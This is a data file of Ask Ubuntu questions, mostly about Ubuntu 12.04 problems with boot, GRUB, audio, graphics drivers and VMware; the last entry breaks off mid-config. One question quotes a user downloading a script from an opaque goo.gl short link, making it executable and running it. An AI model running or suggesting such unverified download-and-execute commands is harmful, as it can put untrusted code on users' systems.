132703	how to uninstall vmware player 4.0.3 on 12.04 ?	i installed vmware player 4.0.3 on ubuntu 12.04 . when i try to run an image , i get errors such as `` /usr/lib/vmware/settings '' : no such file or directory . or `` ~/.vmware/config '' : no such file or directory.. i tried patching it but i get unable to install vmnet message from the patch , thus i would like to uninstall the player and re-install it . the install file was a bash script downloaded from vmware , not a package , it does n't appear in dpkg . so , how do you uninstall vmware player 4.0.3 ?
132709	tomcat and apache http together	can i install apache tomcat 6 and apache http web server on the same machine ( ubuntu 11.10 ) without problems ? tomcat to serve geoserver apache web serve to serve static files
132712	how do i share my wi-fi via wi-fi direct on my laptop ?	on windows , my laptop 's wireless card had the ability to share its own internet by wi-fi direct . i could connect by laptop to other devices via intel 's my wi-fi program , which i believe uses wi-fi direct , and then share my internet to them . is there any way to do this in ubuntu ? my laptop model : samsung np300e5a . my wireless card : intel corporation centrino wireless-n 130 . thanks ! edit : i am using ubuntu 12.04 . also , i am not trying to share my ethernet connection . i am trying to share my wireless connection to other wi-fi devices . see here .
132713	i can not use hibernate/sleep in ubuntu 12.04	i have 3.9 gb of ram,261 gb of hdd , and 3.9 gb of swap ( toshiba laptop ) . the problem is that i can not hibernate or sleep the laptop for some reason . any help ?
132719	extraneous ubuntu one icon on the unity launcher ?	after installing ubuntu one and starting a synchronization , i noticed that when i have the ubuntu one dialog visible , i will have 2 icons for ubuntu one on the unity launcher . one appears to be the application that is uploading . the other indicates `` waiting to install '' when i hover the cursor over it . why do i have another ubuntu one icon that is waiting for installation when i have already installed it ?
132722	foremost running without livecd	can you run foremost without a livecd or liveusb ? because from what i have read ( the data recovery page of ubuntu ) , it says that you need one .
132724	how do i compile the latest gvim from source	i have found that i need to compile the lastest gvim due to a bug i have reported , but how do i proceed ?
132738	ubuntu freezes at the purple screen , but if i force re-boot , it shows busybox shell with initramfs . happens 80 % time	i tried both ubuntu 11.04,11.10 & 12.04 . it frequently freezes at the purple screen ( the screen before the 5-dot ubuntu screen ) i wait for 10-15 mins and when i force re-boot , it ends up showing the ubuntu busybox black screen with initramfs prompt . i checked many forums and many of them said to try this out -- -- > 1.boot using ubuntu liveusb 2.in terminal , sudo fdisk -l i see sda7 as my linux partition ( i hv windows 7 also installed ) sudo fsck /dev/sda7 it shows many things.one of them i remeber is `` recovering journal '' and press enter for whatever questions asked during the process.now when i go back , remove liveusb and boot ubuntu normally , it works fine.but the same problem ( freezing at the purple screen- > force reboot- > ends in busybox ) comes up after 2 or 3 re-boots . no problems when i install ubuntu 10.04 or 10.10 . then i thought it might be a problem with the kernal i m using.so i installed the kernal which ubuntu 10.10 uses , but it was of no use.the problem still remains . someone please help . thanks in advance
132745	how to install ubuntu 32bit with wubi	i want to install ubuntu 12.04 32bit with wubi , i tried to create shortcut from wubi.exe and change target to `` 32bit '' but it did n't work and remained downloading 64bit can any one help me ?
132757	video lens only displays up to 100 local videos	the video lens only displays 100 of 'my videos ' , even though i have hundreds more . if i add more to the folder , that gets displayed , but others are removed . is there any way to increase the limit , to display them all ? i really would love to use this feature , but i would require it to index my entire video folder for me to browse using this lens .
132758	unity 3d display lag	i find that there is quite a lot of lag when using unity after upgrading to precise . it seems that when i first start up the computer , everything is fine , but then if i put the computer on standy for a while and then come back to it , the display is extremely slow and there is a significant delay to visual effects that make the system rather cumbersome to use . i tried to report this as a bug but then bug reporting tool directed me to ask this is a question here first . ati radeon xpress 1250 , proprietary ati drivers are not available for this card with modern distributions since 2009 . the effects have worked before on unity but recently after each upgrade they have been degraded . i am now using the gnome classic desktop which works wonderful even with effects but obviously i would like unity to work . thanks for any ideas
132762	installing ubuntu 12.04 on a new hard drive and booting from it	i 've just bought ssd and installed 12.04 on it . i have 11.10 on my old hard drive . however i ca n't boot from ssd since grub and everything else is on the hdd . how do i set ubuntu to boot from ssd ?
132764	where did everything go in nautilus ?	well this is most frustrating in what used to be called nautilus where is the drop down to allow me to select the view i want ? where is the right click -- > make new folder gone in list view when the window is full ? i used to do sudo nautilus to change chmod and owner - no nautilus so what is it now called ?
132770	how do i stop sound coming from my speakers with a faulty headphone socket ?	on my laptop , i have a faulty headphone socket , so when i insert headphones into it , the speakers do not mute . i can confirm that this problem is caused by faulty hardware and not software as when i twist the headphone jack , the speakers come on and off according to the movements . on previous versions of ubuntu , i worked around this problem by going into alsamixer and disabling `` auto-mute mode '' , and then going into the sound settings and choosing `` analog headphones '' . however , on 12.04 , no such option exists , rendering my headphones unusable with no way to work around the problem . i momentarily thought i had this problem fixed when i installed pulseaudio volume control from the software centre . i selected the output devices tab , and under `` built-in audio analogue stereo '' i selected `` headphones '' for the port . however , this almost randomly seems to change back to `` speakers '' , despite me setting `` auto-mute mode '' as disabled . basically , i would like a way to permanently mute the speakers so only the headphones will play sound , without it losing my settings . it is ridiculous that such a simple setting has been taken away to `` simplify '' the user interface .
132772	ubuntu 12.04 terminal and dual display issue	after upgrading to 12.04 i had a lot of issues with the dual desktop environment . the unity bar is appended to both sides , so when i 'm dragging windows from one monitor to the other it hangs on the hidden unity bar and then finally lets me force it over . while trying to switch to cinnamon which seemed to have aborted on confirming install , my terminal will come up but is now blank with no cursor.. usually i have a good time troubleshooting and fixing things in ubuntu , but not so much this round . i do n't expect much assistance with the dual monitor situation , but anyone have any idea how i can get my terminal back to normal.. i 'm sure once i reboot it will be fine.. btw , i 've messed with compbiz , myunity , and ati
132779	how to delete program installed with .bundle ?	recently i install vmware 4.1 ( which is bundle file ) . now i want to remove it . how to do that ?
132780	msi wind u100 locks up after suspend while on battery	my netbook locks up after suspending while using the battery . it happened in the former version of ubuntu and it is happening in ubuntu 12.04 . it is most discouraging to have to reboot . anyway i found a fix for lucid at pcurtis.com that worked . it used the gconf-editor to uncheck 'use_time_for_policy ' . but 12.04 does n't use gconf-editor . is there a similar configuration in 12.04 ?
132781	league of legends with virtualbox	is it possible for me to run league of legends ( lol ) on windows 7 in vbox ? my specs : intel i3 4 gb ram 512 mb vga
132786	how can i move the top panel to the bottom in gnome 3 ?	is there a way to move the top panel to the bottom in gnome 3 ? it is very annoying to have this panel at the top , because then i have to aim for the close button when i want to close a window . when the panel is at the bottom , i can simply throw the mouse pointer to the corner . big usability issue .
132789	how do i reduce the space allocated to ubuntu ?	i have installed ubuntu 12.04 , but now i am not satisfied as it has taken more space 100 gb . since i have to use windows more often , i found that i am unable to see the files of ubuntu when i open the window . therefore i want to give smaller file system ( repartition ) . please guide me so that i can reduce the volume of my ubuntu file system .
132794	internal errors-invalid parameters received ! [ problem with wine ]	i 'm trying to instal half life to my ubuntu 12.04.i am runing wine 1.5.3 and playonlinux , and when i try to install , error was hapened . please help this is my best game of all time and i really want to play half life . ( sorry , my english is really bad : ( )
132795	recovering open document format files and ole in one go	is there a recovery program that recovers both ole files ( ms office files , i.e . .doc , .docx ) and open document format files ( libre/open office ones , i.e .odt ) on ubuntu 12.04 ? i deleted these files with shift+delete .
132798	ca n't boot into windows after installing ubuntu on usb	i 'm new to ubuntu . i 've installed ubuntu 12.04 on a usb flash drive . it boots fine from the usb stick . but if i remove it and boot again , window 7 should boot . well it does n't . seems like the hard disk is not there any more . must have done something wrong while installing ubuntu . my laptop is an acer aspire 1410 without a dvd reader . the usb flash drive is a 64g sandisk cruzer . i 've check in the bios and it still see the hard drive . when i 'm on ubuntu i 'm also unable to see my local hard disk . how can i solve this problem ?
132799	12.04 is overheating my samsung rf411	i was using windows 7 for months and never had any problem with overheating , then i decided to try ubuntu and i just loved it and decided to migrate . however , the computer keeps shutting down for overheating problems , as of now the temperature is 75c , and i 'm doing nothing special . i 'm running ubuntu 12.04 lts amd64 and these are system specs : 2nd generation core i3 8gb ram 64gb ssd geforce 540m
132805	why i can not install ubuntu on my laptop ?	i 've tried to install ubuntu 11.04 and 12.04 , but i have the same problem on both . i proceed like this : i restart my computer , the language menu shows and i select my language , and then select to set up ubuntu . then i get a black page , and nothing else . i have an ati graphics card . my laptop is an hp g62 series . what should i do to make the install work ?
132813	/usr/bin/ld : can not find -lustdio	so , i 'm compiling a program from source , and the compilation fails when it tries to link `` libustdio.so '' : /usr/bin/ld : can not find -lustdio i 'm pretty sure that its part of the icu library , which i have already installed the libicu48 and libicu-dev packages . is there a way to figure out for sure if `` libustdio.so '' is a part of libicu48 or libicu-dev packages ? if so , then why is the library missing , and how do i fix this ?
132814	i 've just downloaded ubuntu , how can i install it ?	i have just download the ubuntu and now do n't know what to do . how can i install it . it does not seem to do anything
132818	what can be the reason to have only two installation option- '' replace '' and `` something else '' ?	here a picture , what can be the reason so i would be able to fix it ? it 's in hebrew but the icons are as known . thank for helping !
132821	grub2 stuck at rescue console , showing `` unknown filesystem '' for all partitions	i installed ubuntu 12.04 on my external usb drive , where i have a 700gb ntfs partition followed by the new 6gb ext4 partition and a swap partition ( all primary ) . the grub mbr is also installed to the external hard disk . since my bios puts the external drive as first disk when booting , i removed my internal hard disk before installation in order to avoid ordering problems . now when i boot from the external drive , grub is stuck at the rescue console with the error `` unknown filesystem '' . grub rescue > ls ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ls ( hd0 , < any of them > ) / gives me `` unknown filesystem '' , thus also `` insmod normal '' grub does n't seem to be able to read my linux partition as you can see above ? ! how can i solve this ? additional info : bootinfoscript says ( this is with the internal drive in again , but that does not make a difference ) : grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos2 ) /boot/grub on this drive . sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb2 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb3 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info :
132822	speakers not working properly on hp elitebook 8440p	since the 11.10 i have this problem : when i start my notebook , speakers do not work , whereas headphones do . after standby and resume , usually but not always , everything works well . any idea how to solve this issue ? my notebook specs : ubuntu 12.04 lts 64bit ( fresh installation ) hp elitebook 8440p the output of aplay -l is the following : lista di playback dispositivi hardware scheda 0 : intel [ hda intel ] , dispositivo 0 : stac92xx analog [ stac92xx analog ] sottoperiferiche : 0/1 sottoperiferica # 0 : subdevice # 0 scheda 1 : nvidia [ hda nvidia ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 1 : nvidia [ hda nvidia ] , dispositivo 7 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 1 : nvidia [ hda nvidia ] , dispositivo 8 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 1 : nvidia [ hda nvidia ] , dispositivo 9 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0
132830	powernow-k8 : hardware error - pending bit very stuck	new install of ubuntu 12.04 on a dual core amd turion x2 one of the problems while running is that the pc wo n't awaken from hibernation . dmesg shows some errors that i do n't understand : powernow-k8 : hardware error - pending bit very stuck powernow-k8 : transition frequency failed powernow-k8 : failing targ , change pending bit set spurios 8259a interrupt : irq7 . fast tsc calibration failed marking tsc unstable due to tscs unsynchronized
132833	can i get a combined inbox in thunderbird ?	i 've setup thunderbird ( default in 12.04 ) with five mail accounts . unfortunatly , every mail address is shown only with its own inbox , sent ... how can i get a combined inbox for all addresses ? i 've searched for extensions , but did not find any that add this feature .
132837	how do i install the latest stable version of libreoffice ?	libreoffice is seeing some dramatic improvements each version and subversion that goes out . i would like to have always the latest version of libreoffice on my machine ( s ) . i know of the ppa that exists but is it recommended to use it with 12.04 for daily use ? what are the pro and cons of using the ppa ? will it break my system/libreoffice installation ? does libreoffice get eventually also upgraded in the ubuntu repositories or does this upgrade happen only with new releases ? who manages the upgrades of libreoffice in ubuntu and in the ppa ?
132838	12.04 stability , compatibility and operational problems	today i installed ubuntu 12.04 a full 5 times . but the continuous output of nonsense errors . first , let me give hardware information ; hp compaq 6735s laptop ; amd trion x2 mobile 64bit precessor ( 2.2 ghz ) 4 gb ram 512 mb ati mobility radeon hd 3200 gpu all the installation attempts , the ati fglrx driver has failed . the screen is now frozen in striate . sometimes it does not turn on and reset take a black screen . 2- next to installation the software center not opened . 3- i tried to install again . this time playing with compiz-manager broken . opened one more desktop wallpaper , and it seems only . desktop does not seem . 4- encrypted home folder and i saw the extreme performance issues . 12.04 version of ubuntu is very unstable and constantly freezes , crashes . amd-ati-based computer to use in particular is terrible . i had to install debian now . in the meantime , while the installation of hard-disks are perceived too late . most importantly , does not working error-reporting programs . unable to send a bug report . programs that failed version of ubuntu , 12.04 ; compiz fusion ( so crashed and does not stable ) home encrypting program ( so slow ) amd-ati driver poor support ( particularly fglrx awful ) too much stability problem error reporting does not working programs 5:10 unity unstable how can i report problems i have ubuntu team ? thank you .
132841	is it risky to download a script with a http : //goo.gl/ link ?	following the advise of an answer in ask ubuntu , i downloaded and ran a script with a url starting by http : //goo.gl/ is it risky to use such file ? could it be a virus or something else ? if yes , what should i do ? some details : i followed this answer , and did wget -o amd-driver-installer-12-4-x86.x86_64.run http : //goo.gl/vgywp chmod +x amd-driver-installer-12-4-x86.x86_64.run ./amd-driver-installer-12-4-x86.x86_64.run -- extract driver
132843	why do i need to create a bios-grub partition when i install 12.04 ?	is the bios-grub partition in ubuntu 12.04 mandatory ? i have used 11.04 , 11.10 and 12.04 , but i was never asked for this . today i tried a fresh installation of ubuntu 12.04 and for the first time i was asked for this grub partition of minimum 1mb . i first tried to reinstall 12.04 , but the error continued . so i installed fedora 16 , keeping all partitions as they were ( replaced ubuntu with fedora ) , and then did another fresh installation of 12.04 . is it ok to continue with this grub partition or is there a fault in my system 's hardware ? if this is a ( hardware ) fault , how can i fix it ? i 'm using a lenovo s10-2 ideapad . the only os right now installed is ubuntu 12.04. well , let me answer . it was /usr/bin/xorg issue that i had with firstly installed precise . i used fedora16 basically for removing precise totally ( my experience tells me ubuntu ca n't completely erase and reinstall by itself ) . this 1mb grub is created by fedora . i then wanted to remove it while reinstalling ubuntu but got caution bootloader may fail . hence i have to keep this 1mb drive . but prior to yesterday , i used both fedora and ubuntu , even same cds , but had no such partition . my question is if this partition is necessary or not ? if not , how can i safely remove it from my system ? am using only ubuntu 12.04 -- before and after ( now ) .
132844	how to adjust skype webcam resolution	i have finally gotten my webcam ( philips spc 300nc ) working in skype , and i thought i was all set . but the resolution is to low ( 176x144 ) so it zoomz in on the side of my face . i downloaded guvcview and set the resolution to 352x288 and it showed perfectly , until i tried to start the webcam in skype , beacause there it stil was in 176x144 . i cant really figure out why . i preload skype with v4l2convert.so and the webcam works great in both cheese , and guvcview .
132846	is there any windows 7 theme that works on 12.04 ?	i have tried to follow the best answer on this question is there an ubuntu theme available to make it look like windows 7 ? but when i enter this code ./win7-setup.sh i get this error : and i have tried to run this command in `` gnome '' , `` gnome classic '' and `` gnome classic ( no effects ) '' i 'm running ubuntu 12.04 64bit . edit : i have installed gdm and tried using gnome-classic with gdm and got the same error .
132860	ubuntu 12.04 gnome shell problem	hey guys i installed gnome shell pn my computer ( hp 6130ew notebook ) . in terminal i wrote sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell when i log out i seems to be okay , i can choose between unity/ gnome / gnome classic but when i click gnome shell it doesnât work and my desktop looks like a gnome classic what should i do ? video show what happens http : //www.youtube.com/watch ? v=psa08ainiiw
132862	getting `` failed to download repository information '' error while updating ?	i updated to 12.04 a week ago . everything is fine , however when i recently tried to update by using the update manager , the update stopped and i received the error message : failed to download repository information the following details were given : w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 404 not found [ ip : 141.30.13.10 80 ] , w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 404 not found [ ip : 141.30.13.10 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . what can i do ?
132864	how do i get a an hp envy 15 ( 2012 ) edition working ?	my specs : hp envy 15 2012 processor : intel core i7 2760qm 2.2 ghz multi-thread capabilities , quadcore . graphics : intel hd 3000 and amd radeon hd 7690m ram : 8gb ddr3 default resolution : 1920 x 1080 on windows 7 , there are 3 `` zooms '' with each resolution , 100 % , 150 % , and 200 % small , medium , and large respectively . my audio is `` beats '' audio . now , i have so many issues with this computer and with linux especially . on gnome shell and kde , i was unable to change my resolution to 1366 x 768 ( normal for 15.6 inch screens like mine ) . i can not use the default 1080 hd resolution because it makes everything look small and it really hurts my eyes . this is the biggest problem for me . i had to drop my arch linux installation : ( and come back to ubuntu 's unity because the option is available . i 'm actually very impressed with 12.04 but , outside of the screen resolution , ubuntu seems to inherit all of arch 's issues . pulseaudio always crashes on log out . ocassionally , lightdm does not work properly as i am unable to log in . so , i ctrl + alt + f2 and dpkg-configure lightdm and then switch to gdm , and once i switch back to lightdm all is good . next , sound is an absolute nightmare . if i try to change my volume , it almost never changes , will freeze whatever is trying to use sound , and crashes everything before actually adjusting the sound . adobe flash is once again garbage too . i believe that there is nothing to do but have false hope in adobe : ( the ubuntu splash rarely works during boot-up and will just show a black screen . i changed the splash , but to no avail . finally , i have a mac-styled touchpad . the way it is made , is like a hybrid of the mac touchpad and physical buttons . in the picture below , you can see the line separate the `` physical '' region where you are able to left and right click as normal on other laptops . on windows , the touchpad is properly recognized . however , on linux , the touchpad is seen as a whole . in other words , if i am moving my cursor and try to click below that line , then the cursor will move because i touched another spot on the touchpad . that is incorrect behavior and completely breaks my workflow . can someone please tell me what to do ? i am prepared to file a bunch of bug reports and cooperate if necessary . i actually really like ubuntu 12.04 and really wish i was able to use it . : (
132868	no audio duplex option in sound options in 12.04 on vaio vpcs131fd	i recently did a clean install of ubuntu 12.04 on a sony vaio vpcs131fd . yet the audio duplex option is missing on my sound option and the computer no longer does jack detection . and i think the sound is a bit weaker now but i am not sure . this computer worked under 11.10 . alsa info aplay -l output : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc275 analog [ alc275 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and lspci | grep audio output : 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 )
132871	how i can set a keyboard shortcut to access the applications or places menu ?	how i can set a keyboard shortcut to access the applications or places menu in gnome classic on ubuntu 12.04 ?
132872	how can i determine why apt-get will install a package ?	this question is similar to how can i find out why a package was installed ? , but in my case i 'd like to know before actually installing a package , why it will install a particular dependency . so for example i might run sudo apt-get install superfoo and the output will say something like : the following extra packages will be installed : foo bar baz ... libderp libjunk and this might be a really huge list . in some instances i 'll see something that is going to be installed that does n't really make sense to me given what i 'm installing , so i want to know why that particular dependency is going to be installed . in the above example let 's say i 'd like to understand why libderp would get installed . i know that somehow there is a chain of dependencies between superfoo and libderp but the huge list of packages to be installed makes it hard to see what this chain is . once i know the dependency chain , i can decide whether i really want to install the original package or not , and/or whether i should get in touch with the maintainer of that package to see if they really need to have those dependencies there .
132876	how to change ( unset ) minimize shortcut in 12.04 ?	i tried to use system preferences , gconf-editor , compiz config settings manager , setting from ctrl+alt+kp_0 to disabled or outer key combination , but nothing happened .
132879	how can i run `` update-manager-kde ''	how to make update-manager-kde work . it does n't show on any menus . typing : `` update-manager-kde '' in the terminal did n't do the trick either .
132882	why do i get a reboot instead of a shutdown ?	after two days of installation , strangely my ubuntu machine is restarting instead of shutdown from both desktop gui and command line . sudo shutdown -h now sudo halt ( does n't shutdown , instead freezes on boot screen plymouth ) i had force shutdown by powering off the machine . this is not happening all the times . i have been using ubuntu for 6 months and never experienced this kind of problem .
132885	error message `` signal out of range 92khz - 58hz `` when starting ubuntu . what is wrong and how can i fix it ?	my monitor has an analogical connection . first i install windows 7 , then i install ubuntu 11.10 , when this installation finish i restarted the pc . any time there i turn on the pc i see the bios configuration ( windows appears with the same , this is normal ) , then appear loading system and 3 seconds later ( with no boot-loader ) i get this message on the monitor : signal out of range 92khz - 58hz because i do n't see anything in the screen i wait around 10 seconds and then appears ubuntu . to boot windows i must press 5 or more times the down arrow key and enter this message appears in different location , as when i press ctrl+alt+f1 ( opening a tty ) this message appears again , then i press ctrl+alt+f7 and appears my desktop with graphic problems . so i think the problem is due to the graphics drivers .
132887	customizing texmaker	i use latex a lot but i find quite obnoxious all the crappy files it leaves behind when you compile : .aux , .log ... fortunately texmaker has the option `` clean '' that deletes all of these . however , i do n't like having to remember to click on it every time i 'm going to close a document , ie i 'd like a button that both closes a document and cleans all that stuff . any hint as how to do it ? i suppose if i knew how to access the program code i 'd be able to do it as i 'd just have to put together two options that already exist . thanks
132888	multi desktop with ubuntu 10.04 and the catalyst control center	i have ubuntu 10.04 installed on my laptop , with an ati mobility radeon hd 3670 . i would like to connect this to an external monitor and use multiple desktops , as opposed to a single extended desktop . i have tried selecting `` display manager - > multi display - > single display desktop ( multi-desktop ) '' and rebooting . this does give me two desktops , but after i move my mouse from the first desktop to the second desktop i can not move it back , and there appears to be no way to switch between the desktops . i have read that people suggest enabling `` display options - > xinerama '' but as far as i understand this would not dynamically adjust the set up depending on whether i have an external desktop connected . i need a solution that will let me easily transition between one and two desktops as i often transition between using one and two screens ( laptop + external monitor ) . the `` single display desktop ( multi-desktop ) '' setting would be appropriate , if only i could figure out how to switch between these desktops . some people have mentioned using open source graphics drivers instead - is this likely to solve the problem ? i assumed that the propriety drivers would be better .
132890	volume range limited to the 80-100 % range in 12.04 lts . works fine in 10.04	same exact problem as reported here : no volume below 80 % in 12.04 lts . fine before with 11.10 also seem to be same as : volume range is narrow in 12.04 no answer of any kind has been forthcoming . i 've been using linux for at least 16 years , but i ca n't figure this one out .
132894	how to fix `` ndiswrapper not found '' ?	i 've been using ndiswrapper to make work some wireless cards using its windows drivers , because they are not yet supported by free linux drivers . until ubuntu 12.04 . now , i can install windows wireless network drivers ( ndisgtk ) from ubuntu software center but when i try to load the driver , i get an error message saying fatal : module ndiswrapper not found . i get the same error if i type on a terminal sudo modprobe ndiswrapper . how can i workaround this bug until it 's fixed ?
132896	ubuntu 12.04 + raid0 + windows 7 not loading	please someone help me ... . ( sorry for my english ) hi , i have a pc with 2 hd ( 1tb each ) on raid0 . i had a windows 7 64bits working for several months . when i installed the windows i let a 100gb partition empty to install ubuntu someday . i was using linux on a virtualbox , but this week i tried to install ubuntu 12.04 in this 100gb partition . i used the ubuntu alternate cd , because the 'normal ' cd was giving me trouble with the raid0 . the grub installation always reported a error . after a lot of work i found that i nedded to install grub on partition /dev/mapper/isw_chjbfeec_dougraid1 ( see bootinfo below ) . the windows installation created a 100mb boot partition , so i needed to install grub in this partition . now i have the ubuntu working 100 % ok . the problem is , the windows is not booting ! the windows option is present on the grub menu , but when i choose the windows option there is a black screen and after that the grub is reloaded . my bootinfo is : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for /boot/grub . = > grub2 ( v1.99 ) is installed in the mbr of /dev/mapper/isw_chjbfeec_dougraid and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for /boot/grub . sda1 : __________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda2 : __________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : isw_chjbfeec_dougraid1 : ________________________________________________________ file system : ntfs boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of isw_chjbfeec_dougraid1 and looks at sector 3841862992 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . no errors found in the boot parameter block . operating system : boot files : /grldr /bootmgr /boot/bcd /grldr isw_chjbfeec_dougraid2 : ________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe isw_chjbfeec_dougraid3 : ________________________________________________________ file system : extended partition boot sector type : - boot sector info : isw_chjbfeec_dougraid5 : ________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img isw_chjbfeec_dougraid6 : ________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 206,848 3,686,402,047 3,686,195,200 7 ntfs / exfat / hpfs /dev/sda3 3,686,402,558 3,907,039,743 220,637,186 5 extended invalid mbr signature found . ebr refers to a location outside the hard drive . /dev/sda2 ends after the last sector of /dev/sda /dev/sda3 ends after the last sector of /dev/sda drive : isw_chjbfeec_dougraid _____________________________________________________________________ disk /dev/mapper/isw_chjbfeec_dougraid : 2000.4 gb , 2000404348928 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907039744 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/mapper/isw_chjbfeec_dougraid1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/mapper/isw_chjbfeec_dougraid2 206,848 3,686,402,047 3,686,195,200 7 ntfs / exfat / hpfs /dev/mapper/isw_chjbfeec_dougraid3 3,686,402,558 3,907,039,743 220,637,186 5 extended /dev/mapper/isw_chjbfeec_dougraid5 3,686,402,560 3,881,876,479 195,473,920 83 linux /dev/mapper/isw_chjbfeec_dougraid6 3,881,876,992 3,907,039,743 25,162,752 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/mapper/isw_chjbfeec_dougraid1 c89c73d19c73b910 ntfs reservado pelo sistema /dev/mapper/isw_chjbfeec_dougraid2 6830883a3088116c ntfs /dev/mapper/isw_chjbfeec_dougraid5 bbab868a-ea53-4be3-ba7d-2737fe6cb24c ext4 /dev/mapper/isw_chjbfeec_dougraid6 7a830a3c-88fb-4cba-80dc-f32e08abfd5b swap /dev/sda isw_raid_member /dev/sdb isw_raid_member /dev/sr0 iso9660 windows7x86x64sk ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control isw_chjbfeec_dougraid isw_chjbfeec_dougraid1 isw_chjbfeec_dougraid2 isw_chjbfeec_dougraid3 isw_chjbfeec_dougraid5 isw_chjbfeec_dougraid6 ================================ mount points : ================================= device mount_point type options /dev/mapper/isw_chjbfeec_dougraid5 / ext4 ( rw , errors=remount-ro ) /dev/sr0 /media/windows7x86x64sk iso9660 ( ro , nosuid , nodev , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 , uhelper=udisks ) ================= isw_chjbfeec_dougraid1/grldr embedded menu : ================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ================== isw_chjbfeec_dougraid5/boot/grub/grub.cfg : ================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else 